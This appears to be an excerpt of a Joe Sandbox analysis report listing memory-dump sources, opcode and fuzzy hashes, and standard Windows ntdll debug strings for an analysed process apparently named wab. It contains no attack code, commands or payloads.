                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 658dde40d0ae3e9cb3297430fec309b60ce79177143db4e57a37df3e86a1eb76
                                                              • Instruction ID: 4a0d3a6298716d12b51c175890ccda6c8d4d57c394e2febc4cd060ae7ea8305b
                                                              • Opcode Fuzzy Hash: 658dde40d0ae3e9cb3297430fec309b60ce79177143db4e57a37df3e86a1eb76
                                                              • Instruction Fuzzy Hash: CB90026124545142D26071DD4844616400567E0201F55C123A5814594D85558DA56621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b6d3a2669e77707eae51223474cb9701412b84b290d04747645dad1f19c20a9
                                                              • Instruction ID: 2cb6b0b057b13984a27d6b785ef3aff4c4b99c28fcee13554c1a65da0b6d3a81
                                                              • Opcode Fuzzy Hash: 0b6d3a2669e77707eae51223474cb9701412b84b290d04747645dad1f19c20a9
                                                              • Instruction Fuzzy Hash: 3E9002E1201540D24610B2D98844B0A450547E0201B55C117E6054560CC5258DA19535
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e0b4b11db8c076bdc3731b2a5b9206f1fba72921c2fe4a309d0bad3d92db1f2
                                                              • Instruction ID: f0a11ad760ae79a065f39f6cf8c18cac81a8db477c011d17b284661af21e2fbc
                                                              • Opcode Fuzzy Hash: 3e0b4b11db8c076bdc3731b2a5b9206f1fba72921c2fe4a309d0bad3d92db1f2
                                                              • Instruction Fuzzy Hash: 6D900265221400420255B5D90A4450B044557D6351395C117F6416590CC6218DB55721
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2955847bde5f2897108916c65c0dadc62aabc34a9630c92901cec499d2417366
                                                              • Instruction ID: 698d7b2cdf1d19177a795c2b551fc6560520fb5c8bc9a5b68fb9ac3cdc3a987d
                                                              • Opcode Fuzzy Hash: 2955847bde5f2897108916c65c0dadc62aabc34a9630c92901cec499d2417366
                                                              • Instruction Fuzzy Hash: 8D900475311400430315F5DD0F44507004747D5351355C133F7015550CD731CDF15531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15c8f429e996a1fe3704e3dc51d8e199e8b37fb7d651715e91d600684942a9d2
                                                              • Instruction ID: 2b57720d5a1c3ca457570d0bedabf1f6426682c208fe6e5dc96d84c88506c28e
                                                              • Opcode Fuzzy Hash: 15c8f429e996a1fe3704e3dc51d8e199e8b37fb7d651715e91d600684942a9d2
                                                              • Instruction Fuzzy Hash: 1C9002A120240043421571D94854616400A47E0201B55C123E6014590DC5258DE16525
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1275968644855aabbbacfad8769ce018f595f762da187fc2823922d027fb3f08
                                                              • Instruction ID: ebca88292e8104b4fafb2add07214fd9173cc3f856f603b4afb78488804d24a0
                                                              • Opcode Fuzzy Hash: 1275968644855aabbbacfad8769ce018f595f762da187fc2823922d027fb3f08
                                                              • Instruction Fuzzy Hash: F490027160540842D26071D94854746000547D0301F55C113A5024654D87558FA57AA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 468ebcea4d631b07a76908d6cdd4db70b05718f4189f5b80d957695874d98704
                                                              • Instruction ID: 5f2712b0ad17c55627b4980185b52a6d7a47c7025b53e5abcb52c2ce0de63eba
                                                              • Opcode Fuzzy Hash: 468ebcea4d631b07a76908d6cdd4db70b05718f4189f5b80d957695874d98704
                                                              • Instruction Fuzzy Hash: 9590027120140842D21471D94C44686000547D0301F55C113AB024655E96658DE17531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b19f6a503b890e22a4b8f2bf0b6aba316b7431cbf1c3472722ba994bf9e52ae
                                                              • Instruction ID: bd04fa688ba3f79ff58aa7116291ceeabfe6035a01c18f2da0f496b5db65e367
                                                              • Opcode Fuzzy Hash: 7b19f6a503b890e22a4b8f2bf0b6aba316b7431cbf1c3472722ba994bf9e52ae
                                                              • Instruction Fuzzy Hash: 1E90027120544882D25071D94844A46001547D0305F55C113A5064694D96258EA5BA61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8234673d3eed343ea1c57d58725a4de4ccf28f4e61cf86b1fb3a2bbf1fc2b58
                                                              • Instruction ID: 69279b3f8419d2fc78532cfb3e8c7413b1909581c999d5c2c594587d5400cf63
                                                              • Opcode Fuzzy Hash: d8234673d3eed343ea1c57d58725a4de4ccf28f4e61cf86b1fb3a2bbf1fc2b58
                                                              • Instruction Fuzzy Hash: 1690027120140842D29071D9484464A000547D1301F95C117A5025654DCA158FA97BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c1265101565cf361206de53491f922171b9ffac64cbeda1bbfdb91fd9f1ef0e
                                                              • Instruction ID: dde30c3b283ecf68ece6550bdafa2ae66df70dc0e8e44b1925950ce39626d8ae
                                                              • Opcode Fuzzy Hash: 4c1265101565cf361206de53491f922171b9ffac64cbeda1bbfdb91fd9f1ef0e
                                                              • Instruction Fuzzy Hash: 2E90027120140882D21071D94844B46000547E0301F55C117A5124654D8615CDA17921
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 41273acb0700ae2a955969beb52628df8dfa435fae665b831250f88709821ea3
                                                              • Instruction ID: ca7ef308389d9244e3d7c0640889fcc5c6f6c6386ce5933cd7f5ff9891dac9b8
                                                              • Opcode Fuzzy Hash: 41273acb0700ae2a955969beb52628df8dfa435fae665b831250f88709821ea3
                                                              • Instruction Fuzzy Hash: B290027120140442D21075D95848646000547E0301F55D113AA024555EC6658DE16531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f42dc08bb3a0b5a82ba8bb0409a93394da566964cfd749e059610828cb0880b
                                                              • Instruction ID: 1b7f8cecc89d9fff6d7ef812dddf190452f6af618922cc725338e1e440937acf
                                                              • Opcode Fuzzy Hash: 8f42dc08bb3a0b5a82ba8bb0409a93394da566964cfd749e059610828cb0880b
                                                              • Instruction Fuzzy Hash: BD90027120140443D21071D95948707000547D0201F55D513A5424558DD6568DA16521
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ac7864f9fde1824c1ae2b3fb77626e6e327515ee72903c2cc120f4324cf90d0
                                                              • Instruction ID: 5ef8028430631abac258c09063d045ff836cf8f5cdf7e0f64e306ffd2033da8a
                                                              • Opcode Fuzzy Hash: 2ac7864f9fde1824c1ae2b3fb77626e6e327515ee72903c2cc120f4324cf90d0
                                                              • Instruction Fuzzy Hash: E190026160540442D25071D95858706001547D0201F55D113A5024554DC6598FA56AA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 307b1e7467edb29ebe6613e197e5eac5c2a51cf25069c8f8423feb74054864b6
                                                              • Instruction ID: b164f8bc0876c4c535f693e6e517a009fb540f6d5a130675e8d799b6713ca104
                                                              • Opcode Fuzzy Hash: 307b1e7467edb29ebe6613e197e5eac5c2a51cf25069c8f8423feb74054864b6
                                                              • Instruction Fuzzy Hash: 3A90026130140043D25071D95858606400597E1301F55D113E5414554CD9158DA65622
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a8afe0e85028343bca27a4b9e4f540b254036410f5b25cf1d51d351d1031636
                                                              • Instruction ID: fa2a30123e8fb27a5a9d6076bfba0225e72e29502495b5616515820b79b7c094
                                                              • Opcode Fuzzy Hash: 0a8afe0e85028343bca27a4b9e4f540b254036410f5b25cf1d51d351d1031636
                                                              • Instruction Fuzzy Hash: A190026120544482D21075D95848A06000547D0205F55D113A6064595DC6358DA1A531
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf018a9c4e8cd354906dc66e456d966d601373a8914a715a84f62d3a154bb11d
                                                              • Instruction ID: 914ebc0ab2c92e5d9bcdfb554712321f1b816f3e58767ae290af25bcac599936
                                                              • Opcode Fuzzy Hash: bf018a9c4e8cd354906dc66e456d966d601373a8914a715a84f62d3a154bb11d
                                                              • Instruction Fuzzy Hash: 0D90027120240182965072D95C44A4E410547E1302B95D517A5015554CC9148DB15621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              Control-flow Graph
                                                              • control_flow_graph 680, starting at block 20252890-202528b3 (graph image not reproduced; legend: Executed / Not Executed)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • ExecuteOptions, xrefs: 202846A0
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 202846FC
                                                              • Execute=1, xrefs: 20284713
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 20284787
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 20284742
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 20284725
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 20284655
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 0a673ff6f8d96b7831a6e5d5e5f4d057e0c89cc8da37c90c2ea4d1f2ebf48c1d
                                                              • Instruction ID: c5b70570c8af331e3f98526932745d30214a9a3698b4753406b94e6cd8c5b06e
                                                              • Opcode Fuzzy Hash: 0a673ff6f8d96b7831a6e5d5e5f4d057e0c89cc8da37c90c2ea4d1f2ebf48c1d
                                                              • Instruction Fuzzy Hash: A3512631A006196BDB19DFE4DC8AFAA77BDEF14304F51009BEA14A7191E730AE658F60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 65954b10a29291181aeb6b77301069fb00b9523cd72830fef8934ea876c18f6c
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 2D81D3B1E1124A8EDF0E8FE4CC917ADBFB5AF89350F14415BE850A7281C7349D688B58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 20287BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 20287B7F
                                                              • RTL: Resource at %p, xrefs: 20287B8E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: d8f83ba3e05bd5dcf6aea607099ddcda03c6b93ef6c26b6fa906da3f1cb16cda
                                                              • Instruction ID: b68d698d3d5ff732a126c68941db478f901f74ad359069e715e0f196ff35222a
                                                              • Opcode Fuzzy Hash: d8f83ba3e05bd5dcf6aea607099ddcda03c6b93ef6c26b6fa906da3f1cb16cda
                                                              • Instruction Fuzzy Hash: D741E239B007029FD719CEA5CC41B5AB7E5EF98710F100A1EF95997A80DB31E9298F91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2028728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 20287294
                                                              • RTL: Re-Waiting, xrefs: 202872C1
                                                              • RTL: Resource at %p, xrefs: 202872A3
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: f4fe4b1dd863b252ef77756bbcc21189440c4c4825a71981f5770b3cdca99572
                                                              • Instruction ID: c4445c357a9bcd55f7f8dffda73899c84c72456dce42c97f97287e68be4efcab
                                                              • Opcode Fuzzy Hash: f4fe4b1dd863b252ef77756bbcc21189440c4c4825a71981f5770b3cdca99572
                                                              • Instruction Fuzzy Hash: AA413239A00206ABD715CEA4CC41F16B7A1FF94310F20061AFD54AB681DB30F862CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 6015f7d019e427edebc05855a85e8900f99f92aac01fd48cce2cdf7e665011d6
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: D291D770E802069BDB28DFD5EC81BAEBFB5AF44320F20451BE954E76C1D7349D688B18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: c320424a68c3df20d646742f71d08ec3ba8c4e9f288ffca69f2cbed2a8a6275e
                                                              • Instruction ID: ef78355b55900c911780b8d34dfa8fcd2ab410a6cab1b27790f79adf7f761a92
                                                              • Opcode Fuzzy Hash: c320424a68c3df20d646742f71d08ec3ba8c4e9f288ffca69f2cbed2a8a6275e
                                                              • Instruction Fuzzy Hash: 52810A71D0126A9BDB258F94CC45BDEB7B8AB08750F0041DBEA19B7250D7709E94CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 2029CFBD
                                                              Strings
                                                              Memory Dump Source
